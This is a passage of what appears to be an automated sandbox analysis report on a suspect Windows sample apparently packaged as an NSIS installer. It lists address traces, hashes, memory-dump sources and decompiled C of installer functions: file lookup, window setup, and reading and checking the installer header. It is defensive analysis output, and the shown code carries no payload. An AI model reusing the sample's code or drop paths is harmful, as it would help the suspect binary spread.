              0x004074d7
              0x004073a5
              0x004073a8
              0x004073ab
              0x004073af
              0x004073b2
              0x004073b8
              0x004073ba
              0x004073ba
              0x004073ba
              0x004073bd
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c3
              0x004073c3
              0x004073c7
              0x00407427
              0x0040742a
              0x0040742f
              0x00407430
              0x00407432
              0x00407434
              0x00407437
              0x00000000
              0x00407437
              0x004073c9
              0x004073cf
              0x004073d2
              0x004073d5
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073e7
              0x004073ea
              0x00407403
              0x00407406
              0x00407409
              0x0040740c
              0x00407410
              0x00407412
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073f4
              0x004073f9
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407419
              0x00407420
              0x00000000
              0x00407422
              0x00000000
              0x00407422
              0x00000000
              0x004070be
              0x004070c1
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00000000
              0x0040728c
              0x0040728a
              0x004074bf
              0x00000000
              0x00000000
              0x00406aee

              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
              • Instruction ID: b5fdc14d1eddcf89792e2e646b4c6bd06a53190dca3d1b375e16d2eed6ded591
              • Opcode Fuzzy Hash: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
              • Instruction Fuzzy Hash: 78F16970D04229CBDF28CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040689A, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E0040689A(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}




              0x004068a5
              0x004068ae
              0x00000000
              0x004068bb
              0x004068b1
              0x00000000

              APIs
              • FindFirstFileW.KERNELBASE(73BCFAA0,00426798,00425F50,00405F62,00425F50,00425F50,00000000,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560), ref: 004068A5
              • FindClose.KERNEL32(00000000), ref: 004068B1
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Find$CloseFileFirst
              • String ID:
              • API String ID: 2295610775-0
              • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
              • Instruction ID: 17741e7b15207d6702ed9fc8e7bdeca0d2b34881c01bff23dce0e4374d0b2feb
              • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
              • Instruction Fuzzy Hash: 1FD0C7315051205BD24116346D4C84765985F55331311CA36B4A5F11A0C7348C3246AC
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403C0B, Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215stringregistryCOMMON
              Download Yara Rule
              C-Code - Quality: 96%
              			E00403C0B(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a274;
				_t22 = E00406931(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E0040640A(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E0040640A(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E00406483(L"1033", _t73 & 0x0000ffff);
				}
				E00403EE1(_t78, _t90);
				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x42a300 =  *0x42a27c & 0x00000020;
				 *0x42a31c = 0x10000;
				if(E00405F19(_t90, L"C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405F19(_t98, _t86) == 0) {
						E00406579(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403EE1(_t78, __eflags);
							__eflags =  *0x42a320;
							if( *0x42a320 != 0) {
								_t33 = E00405677(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5);
							_t39 = E004068C1("RichEd20");
							__eflags = _t39;
							if(_t39 == 0) {
								E004068C1("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E00403FB9, 0);
							E00403B5B(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E0040640A(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a2b8 + _t78 * 2,  *0x42a2b8 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x4b
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405E3E(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040653C(_t86, E00405E11(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E5D(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























              0x00403c11
              0x00403c1a
              0x00403c21
              0x00403c23
              0x00403c37
              0x00403c49
              0x00403c52
              0x00403c5b
              0x00403c62
              0x00403c67
              0x00403c6e
              0x00403c81
              0x00403c81
              0x00403c8c
              0x00403c25
              0x00403c25
              0x00403c30
              0x00403c30
              0x00403c91
              0x00403c9b
              0x00403ca4
              0x00403ca9
              0x00403cba
              0x00403d4c
              0x00403d54
              0x00403d5d
              0x00403d5d
              0x00403d73
              0x00403d79
              0x00403d87
              0x00403e08
              0x00403e10
              0x00403e1a
              0x00403e1f
              0x00403e25
              0x00403eaf
              0x00403eb4
              0x00403eb6
              0x00403ed2
              0x00000000
              0x00403ed2
              0x00403eb8
              0x00403ebe
              0x00403ec6
              0x00403ec6
              0x00000000
              0x00403ebe
              0x00403e33
              0x00403e3e
              0x00403e43
              0x00403e45
              0x00403e4c
              0x00403e4c
              0x00403e57
              0x00403e5f
              0x00403e61
              0x00403e63
              0x00403e6c
              0x00403e6f
              0x00403e75
              0x00403e75
              0x00403e94
              0x00403ea5
              0x00000000
              0x00403eaa
              0x00403e12
              0x00403e14
              0x00000000
              0x00403d89
              0x00403d89
              0x00403d95
              0x00403d9f
              0x00403da5
              0x00403daa
              0x00403db9
              0x00403ed7
              0x00403ed7
              0x00000000
              0x00403ed7
              0x00403dc8
              0x00403e03
              0x00000000
              0x00403e03
              0x00403cc0
              0x00403cc0
              0x00403cc3
              0x00403cc5
              0x00000000
              0x00000000
              0x00403cd3
              0x00403ce5
              0x00403cea
              0x00403cf3
              0x00000000
              0x00000000
              0x00403cf9
              0x00403cfb
              0x00403d08
              0x00403d08
              0x00403d11
              0x00403d17
              0x00403d3f
              0x00403d47
              0x00000000
              0x00403d29
              0x00403d2a
              0x00403d33
              0x00403d39
              0x00403d3a
              0x00000000
              0x00403d3a
              0x00403d35
              0x00403d37
              0x00000000
              0x00000000
              0x00000000
              0x00403d37
              0x00403d17

              APIs
                • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
              • GetUserDefaultUILanguage.KERNELBASE(00000002,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,00000000), ref: 00403C25
                • Part of subcall function 00406483: wsprintfW.USER32 ref: 00406490
              • lstrcatW.KERNEL32(1033,00423748), ref: 00403C8C
              • lstrlenW.KERNEL32(KXCJDFJSKF,?,?,?,KXCJDFJSKF,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,73BCFAA0), ref: 00403D0C
              • lstrcmpiW.KERNEL32(?,.exe,KXCJDFJSKF,?,?,?,KXCJDFJSKF,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403D1F
              • GetFileAttributesW.KERNEL32(KXCJDFJSKF), ref: 00403D2A
              • LoadImageW.USER32 ref: 00403D73
              • RegisterClassW.USER32 ref: 00403DB0
              • SystemParametersInfoW.USER32 ref: 00403DC8
              • CreateWindowExW.USER32 ref: 00403DFD
              • ShowWindow.USER32(00000005,00000000), ref: 00403E33
              • GetClassInfoW.USER32 ref: 00403E5F
              • GetClassInfoW.USER32 ref: 00403E6C
              • RegisterClassW.USER32 ref: 00403E75
              • DialogBoxParamW.USER32 ref: 00403E94
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
              • String ID: "C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$KXCJDFJSKF$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
              • API String ID: 606308-3626820478
              • Opcode ID: e72121f9318e9a8d3ba69cbfb00b5424d628858843ee7b3eb32a151408395cbd
              • Instruction ID: e394074358681fdac01dfd3b015b47ae0866f78f7b6160babfbfeef1d79938ee
              • Opcode Fuzzy Hash: e72121f9318e9a8d3ba69cbfb00b5424d628858843ee7b3eb32a151408395cbd
              • Instruction Fuzzy Hash: EA61D570240200BAD720AF66AD45F2B3A7CEB84B09F40457FF941B22E2CB7D9D12867D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403068, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 204memoryCOMMON
              Download Yara Rule
              C-Code - Quality: 99%
              			E00403068(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				signed int _t54;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				signed int _t102;
				signed int _t104;
				void* _t106;
				signed int _t107;
				signed int _t110;
				intOrPtr* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a270 = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs\\hmhrpib.exe", 0x400);
				_t106 = E00406032(L"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs\\hmhrpib.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040653C(L"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs", L"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs\\hmhrpib.exe");
				E0040653C(0x439000, E00405E5D(L"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs"));
				_t54 = GetFileSize(_t106, 0);
				__eflags = _t54;
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E00402FC6(1);
					__eflags =  *0x42a278 - _t94;
					if( *0x42a278 == _t94) {
						goto L32;
					}
					__eflags = _v12 - _t94;
					if(_v12 == _t94) {
						L28:
						_t111 = GlobalAlloc(0x40, _v20);
						E00406A8C(0x40ce68);
						E00406061(0x40ce68,  &_v560, L"C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403590( *0x42a278 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403309(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x42a274 = _t111;
								 *0x42a27c =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a280 =  *0x42a280 + 1;
									__eflags =  *0x42a280;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
									__eflags = _t102;
								} while (_t102 != 0);
								_t71 =  *0x420ef4; // 0x3770f
								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
								E00405FED(0x42a2a0, _t111 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403590( *0x420ef0);
					_t77 = E0040357A( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L32;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L32;
					}
					goto L28;
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a278) & 0x00007e00) + 0x200;
						__eflags = _t110 - _t82;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						_t83 = E0040357A(0x418ef0, _t107);
						__eflags = _t83;
						if(_t83 == 0) {
							E00402FC6(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a278;
						if( *0x42a278 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402FC6(0);
							}
							goto L20;
						}
						E00405FED( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t89;
						_t104 =  *0x420ef0; // 0x2f5b0
						 *0x42a320 =  *0x42a320 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t110;
						 *0x42a278 = _t104;
						if(_t92 > _t110) {
							goto L32;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v12 = _v12 + 1;
							_t110 = _t92 - 4;
							__eflags = _t107 - _t110;
							if(_t107 > _t110) {
								_t107 = _t110;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t110 -  *0x420f00; // 0x31437
						if(__eflags < 0) {
							_v8 = E00406A1E(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
						__eflags = _t110;
					} while (_t110 != 0);
					_t94 = 0;
					__eflags = 0;
					goto L24;
				}
			}































              0x00403073
              0x00403076
              0x00403079
              0x00403093
              0x00403098
              0x004030ab
              0x004030b0
              0x004030b6
              0x00000000
              0x004030b8
              0x004030c9
              0x004030da
              0x004030e1
              0x004030e7
              0x004030e9
              0x004030ee
              0x004030f0
              0x004031db
              0x004031dd
              0x004031e2
              0x004031e9
              0x00000000
              0x00000000
              0x004031ef
              0x004031f2
              0x0040321e
              0x0040322e
              0x00403230
              0x00403241
              0x0040325c
              0x00403262
              0x00403265
              0x0040326a
              0x00403289
              0x00403299
              0x004032ab
              0x004032b0
              0x004032b5
              0x004032b8
              0x004032c1
              0x004032c5
              0x004032cd
              0x004032d2
              0x004032d4
              0x004032d4
              0x004032d4
              0x004032dc
              0x004032dc
              0x004032df
              0x004032e0
              0x004032e0
              0x004032e3
              0x004032e5
              0x004032e5
              0x004032e5
              0x004032e8
              0x004032ef
              0x004032fb
              0x00403300
              0x00000000
              0x00403300
              0x00000000
              0x004032b8
              0x00000000
              0x0040326c
              0x004031fa
              0x00403205
              0x0040320a
              0x0040320c
              0x00000000
              0x00000000
              0x00403215
              0x00403218
              0x00000000
              0x00000000
              0x00000000
              0x004030f6
              0x004030fb
              0x00403100
              0x00403104
              0x0040310b
              0x00403110
              0x00403112
              0x00403114
              0x00403114
              0x00403118
              0x0040311d
              0x0040311f
              0x00403278
              0x004032ba
              0x00000000
              0x004032ba
              0x00403125
              0x0040312c
              0x004031a8
              0x004031ac
              0x004031b0
              0x004031b5
              0x00000000
              0x004031ac
              0x00403135
              0x0040313a
              0x0040313d
              0x00403142
              0x00000000
              0x00000000
              0x00403144
              0x0040314b
              0x00000000
              0x00000000
              0x0040314d
              0x00403154
              0x00000000
              0x00000000
              0x00403156
              0x0040315d
              0x00000000
              0x00000000
              0x0040315f
              0x00403166
              0x00000000
              0x00000000
              0x00403168
              0x0040316e
              0x00403177
              0x0040317d
              0x00403180
              0x00403182
              0x00403188
              0x00000000
              0x00000000
              0x0040318e
              0x00403192
              0x0040319a
              0x0040319a
              0x0040319d
              0x004031a0
              0x004031a2
              0x004031a4
              0x004031a4
              0x00000000
              0x004031a2
              0x00403194
              0x00403198
              0x00000000
              0x00000000
              0x00000000
              0x004031b6
              0x004031b6
              0x004031bc
              0x004031c8
              0x004031c8
              0x004031cb
              0x004031d1
              0x004031d1
              0x004031d1
              0x004031d9
              0x004031d9
              0x00000000
              0x004031d9

              APIs
              • GetTickCount.KERNEL32 ref: 0040307C
              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,00000400), ref: 00403098
                • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,80000000,00000003), ref: 00406036
                • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\AppData\Roaming\tteegmiuoefs,C:\Users\user\AppData\Roaming\tteegmiuoefs,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,80000000,00000003), ref: 004030E1
              • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 00403223
              Strings
              • "C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" , xrefs: 00403068
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403072, 0040323B
              • Null, xrefs: 0040315F
              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004032BA
              • soft, xrefs: 00403156
              • C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe, xrefs: 00403082, 00403091, 004030A5, 004030C2
              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040326C
              • Error launching installer, xrefs: 004030B8
              • Inst, xrefs: 0040314D
              • C:\Users\user\AppData\Roaming\tteegmiuoefs, xrefs: 004030C3, 004030C8, 004030CE
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
              • String ID: "C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\tteegmiuoefs$C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
              • API String ID: 2803837635-3957281496
              • Opcode ID: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
              • Instruction ID: 3c019e557a6e0d840000321a6ffc1a5a74fe8930866e2d2a4a5af375f72a0401
              • Opcode Fuzzy Hash: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
              • Instruction Fuzzy Hash: 9B71E431A00204ABDB20DF64DD85B5E3EBCAB18315F2045BBF901B72D2D7789E458B6D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040176F, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402D3E(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E88( *(_t86 - 8));
